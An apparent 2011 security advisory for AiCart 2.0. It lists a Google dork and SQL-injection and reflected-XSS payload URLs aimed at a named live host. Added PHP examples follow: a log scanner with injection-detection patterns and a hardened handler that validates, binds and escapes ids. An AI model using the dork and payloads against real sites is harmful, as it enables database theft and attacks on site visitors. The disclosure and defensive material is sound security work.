================================== [AiCart 2.0 Multiple Vulnerabilities]
================================================================================
[Date] [18.06.2011]
[Software URL] [http://www.aicart.ca/]
[Version] [2.0]
[Google Dork] [inurl:/store.php?action=view_product&pid=]
[System] [PHP]
[Testing System] [Fedora]
[Risk Level] [High]
[CVE] [-]
===Author Details===============================================================
[Author] [takeshix]
[Author Contact] [takeshix.query@googlemail.com]
================================================================================
[SQLi] http://www.bkjia.com/store.php?action=view_product&pid=
[SQLi] http://www.bkjia.com/store.php?rid=
[SQLi] http://www.bkjia.com/news.php?nid=&action=view
[XSS]  http://www.bkjia.com/store.php?action=view_product&pid=<script>alert(takeshix)</script>
[XSS]  http://www.bkjia.com/store.php?rid=<script>alert(takeshix)</script>
[XSS]  http://www.bkjia.com/news.php?nid=<script>alert(takeshix)</script>&action=view
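The advisory names three id parameters (pid and rid on store.php, nid on news.php) that accept SQL and script payloads. The script below is an added example, not part of the advisory or of AiCart: it scans web server access-log lines for requests to those endpoints whose id parameter is anything other than a plain integer, and labels each hit as SQLi-like, XSS-like or simply non-numeric. The log lines at the bottom are constructed samples using documentation IP addresses.

```php
<?php
// Added example (not part of the original advisory): scan a web server access log
// for requests to the AiCart endpoints named above whose id parameter (pid, rid,
// nid) carries something other than a plain integer, and classify the payload.
// The log lines at the bottom are constructed samples.

declare(strict_types=1);

// Endpoint => id parameters it takes, as listed in the advisory.
const WATCHED = [
    '/store.php' => ['pid', 'rid'],
    '/news.php'  => ['nid'],
];

// Indicator patterns used only to label a finding; any non-integer id is flagged.
const PATTERNS = [
    'sqli' => '/(\'|"|--|\/\*|\bunion\b|\bselect\b)/i',
    'xss'  => '/(<\s*script|javascript:|on\w+\s*=)/i',
];

// Parse one combined-log-format line into path and (url-decoded) query parameters.
function parseRequest(string $line): ?array
{
    if (!preg_match('/"(?:GET|POST) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
        return null;
    }
    $url = parse_url($m[1]);
    if ($url === false) {
        return null;
    }
    $params = [];
    if (isset($url['query'])) {
        parse_str($url['query'], $params);   // parse_str also url-decodes the values
    }
    return ['path' => $url['path'] ?? '', 'params' => $params];
}

// Return findings for one request: [param, value, kind] per suspicious id parameter.
function classify(array $req): array
{
    $findings = [];
    $watched = WATCHED;
    foreach ($watched[$req['path']] ?? [] as $param) {
        if (!isset($req['params'][$param])) {
            continue;
        }
        $value = (string)$req['params'][$param];
        if (ctype_digit($value)) {
            continue;                         // a plain numeric id is what the app expects
        }
        $kind = 'non-numeric';
        foreach (PATTERNS as $name => $re) {
            if (preg_match($re, $value)) {
                $kind = $name;
                break;
            }
        }
        $findings[] = ['param' => $param, 'value' => $value, 'kind' => $kind];
    }
    return $findings;
}

// Scan many lines; returns one entry per flagged parameter with the client IP.
function scanLog(iterable $lines): array
{
    $hits = [];
    foreach ($lines as $line) {
        $req = parseRequest($line);
        if ($req === null) {
            continue;
        }
        $ip = explode(' ', $line, 2)[0];
        foreach (classify($req) as $f) {
            $hits[] = ['ip' => $ip, 'path' => $req['path']] + $f;
        }
    }
    return $hits;
}

// Constructed sample log lines (RFC 5737 documentation addresses).
$sample = [
    '203.0.113.5 - - [18/Jun/2011:10:00:01 +0000] "GET /store.php?action=view_product&pid=42 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [18/Jun/2011:10:00:07 +0000] "GET /store.php?action=view_product&pid=42%27 HTTP/1.1" 500 312',
    '198.51.100.9 - - [18/Jun/2011:10:01:12 +0000] "GET /news.php?nid=%3Cscript%3Ealert(takeshix)%3C/script%3E&action=view HTTP/1.1" 200 3300',
    '198.51.100.9 - - [18/Jun/2011:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 1200',
];

foreach (scanLog($sample) as $hit) {
    printf("%-13s %s %s=%s [%s]\n", $hit['ip'], $hit['path'], $hit['param'], $hit['value'], $hit['kind']);
}
```

Run it with `php scan.php` (any file name) against real log lines piped in place of the sample array. Flagging on "not an integer" rather than on a payload signature is deliberate: the application only ever expects numeric ids in these parameters, so the patterns serve to label a hit, not to decide whether it is one.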
================================================================================
[Hackademics] [DSU] [UNITS]
================================================================================
[Hacktivistas]
Fix: filter the pid, rid and nid parameters (validate them as integers before they reach the database, and escape anything reflected into the page).
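What "filter" means in practice for the pid parameter, as an added example that is not AiCart's code: the id is validated as a positive integer, bound into a prepared statement rather than concatenated into SQL, and every value written to the page is HTML-escaped. rid (store.php) and nid (news.php) get the same treatment. The table and column names (products: id, name, description) and the in-memory SQLite setup are assumptions for the demo.

```php
<?php
// Added example, not AiCart's own code: a hardened store.php view_product handler
// showing how to "filter" the pid parameter. rid (store.php) and nid (news.php)
// get the same treatment. Table/column names (products: id, name, description)
// are assumed; the demo runs against an in-memory SQLite database.

declare(strict_types=1);

// Accept only a positive integer id. FILTER_VALIDATE_INT returns false for
// inputs such as 42' or <script>..., so payloads never reach the query or page.
function productIdFromRequest(array $query): ?int
{
    $pid = filter_var($query['pid'] ?? '', FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1],
    ]);
    return $pid === false ? null : $pid;
}

// Look the product up with a prepared statement; the id is bound, not interpolated.
function fetchProduct(PDO $db, int $pid): ?array
{
    $stmt = $db->prepare('SELECT id, name, description FROM products WHERE id = :id');
    $stmt->bindValue(':id', $pid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Escape everything on output so neither stored data nor the request can become markup.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Handler for action=view_product; returns the HTML fragment to send.
function viewProduct(PDO $db, array $query): string
{
    $pid = productIdFromRequest($query);
    if ($pid === null) {
        if (PHP_SAPI !== 'cli') {
            http_response_code(400);
        }
        return '<p>Invalid product id.</p>';      // never echo the raw input back
    }
    $product = fetchProduct($db, $pid);
    if ($product === null) {
        if (PHP_SAPI !== 'cli') {
            http_response_code(404);
        }
        return '<p>No such product.</p>';
    }
    return '<h1>' . e($product['name']) . '</h1><p>' . e($product['description']) . '</p>';
}

// Demo against an in-memory SQLite database (requires the pdo_sqlite extension).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT)');
$db->exec("INSERT INTO products VALUES (42, 'Widget', 'A <b>plain</b> widget')");

// Of these inputs, only the integer ids reach the database; the others are rejected
// before any query runs, and nothing from the request is echoed back.
foreach (['42', "42'", '<script>alert(takeshix)</script>', '7'] as $input) {
    echo str_pad($input, 34), ' => ', viewProduct($db, ['action' => 'view_product', 'pid' => $input]), PHP_EOL;
}
```

The same three moves cover the news.php nid parameter and the store.php rid parameter: validate as an integer, bind into the query, escape on output. Rejecting the request without reflecting the supplied value also removes the reflected XSS listed above, since the page no longer prints what it received.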